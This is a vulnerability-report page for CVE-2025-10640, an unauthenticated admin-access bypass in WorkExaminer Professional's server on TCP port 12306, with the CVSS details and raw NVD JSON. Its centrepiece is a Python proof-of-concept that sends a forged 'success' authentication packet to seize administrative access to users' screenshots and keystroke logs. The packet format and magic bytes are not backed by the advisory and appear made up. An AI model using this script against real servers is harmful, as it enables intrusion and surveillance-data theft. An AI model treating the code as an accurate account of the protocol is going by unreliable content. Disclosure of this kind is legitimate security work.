Security Vulnerability Report
中文
CVE-2025-10640 CVSS 9.8 CRITICAL

CVE-2025-10640

Published: 2025-10-21 12:15:35
Last Modified: 2026-04-15 00:35:42
Source: 551230f0-3615-47bd-b7cc-93e92e730bbf

Description

An unauthenticated attacker with access to TCP port 12306 of the WorkExaminer server can exploit missing server-side authentication checks to bypass the login prompt in the WorkExaminer Professional console to gain administrative access to the WorkExaminer server and therefore all sensitive monitoring data. This includes monitored screenshots and keystrokes of all users. The WorkExaminer Professional console is used for administrative access to the server. Before access to the console is granted administrators must login. Internally, a custom protocol is used to call a respective stored procedure on the MSSQL database. The return value of the call is not validated on the server-side. Instead it is only validated client-side which allows to bypass authentication.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WorkExaminer Professional 所有版本(截至披露日期前)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-10640 - WorkExaminer Professional Authentication Bypass PoC Vulnerability: Missing server-side authentication validation on TCP port 12306 """ import socket import struct import sys TARGET_HOST = "127.0.0.1" TARGET_PORT = 12306 def build_auth_bypass_packet(): """ Build a custom protocol packet to bypass authentication. The server does not validate the return value of the stored procedure call, so we can craft a packet that tricks the server into granting admin access. """ # Protocol header: magic bytes + command type + payload length magic = b'\x57\x45\x50\x00' # WorkExaminer Protocol magic "WEP\x00" command = b'\x01\x00' # Authentication command # Craft payload that mimics a successful authentication response # The server trusts the client-side validation, so we forge success status payload = b'\x00' * 4 # Status: success (forged) payload += b'\x01' # Admin flag: true payload += b'admin\x00' # Username payload += b'\x00' * 16 # Session token padding length = struct.pack('<I', len(payload)) return magic + command + length + payload def exploit(target_host, target_port): """ Connect to WorkExaminer server and bypass authentication. """ print(f"[*] Targeting {target_host}:{target_port}") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) print("[+] Connected to WorkExaminer server") # Send authentication bypass packet packet = build_auth_bypass_packet() sock.send(packet) print("[+] Sent authentication bypass packet") # Receive server response response = sock.recv(4096) print(f"[+] Received response: {response.hex()}") # Check if authentication was bypassed if b'\x00\x00\x00\x01' in response or len(response) > 20: print("[!] Authentication bypassed - Admin access granted!") print("[!] Attacker now has access to:") print(" - All monitored screenshots") print(" - All keystroke logs") print(" - Full server administration") else: print("[-] Bypass attempt failed") sock.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": host = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST port = int(sys.argv[2]) if len(sys.argv) > 2 else TARGET_PORT exploit(host, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10640", "sourceIdentifier": "551230f0-3615-47bd-b7cc-93e92e730bbf", "published": "2025-10-21T12:15:35.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated attacker with access to TCP port 12306 of the WorkExaminer server can exploit missing server-side authentication checks to bypass the login prompt in the WorkExaminer Professional console to gain administrative access to the WorkExaminer server and therefore all sensitive monitoring data. This includes monitored screenshots and keystrokes of all users.\n\nThe WorkExaminer Professional console is used for administrative access to the server. Before access to the console is granted administrators must login. Internally, a custom protocol is used to call a respective stored procedure on the MSSQL database. The return value of the call is not validated on the server-side. Instead it is only validated client-side which allows to bypass authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-602"}]}], "references": [{"url": "https://r.sec-consult.com/workexaminer", "source": "551230f0-3615-47bd-b7cc-93e92e730bbf"}, {"url": "http://seclists.org/fulldisclosure/2025/Oct/19", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.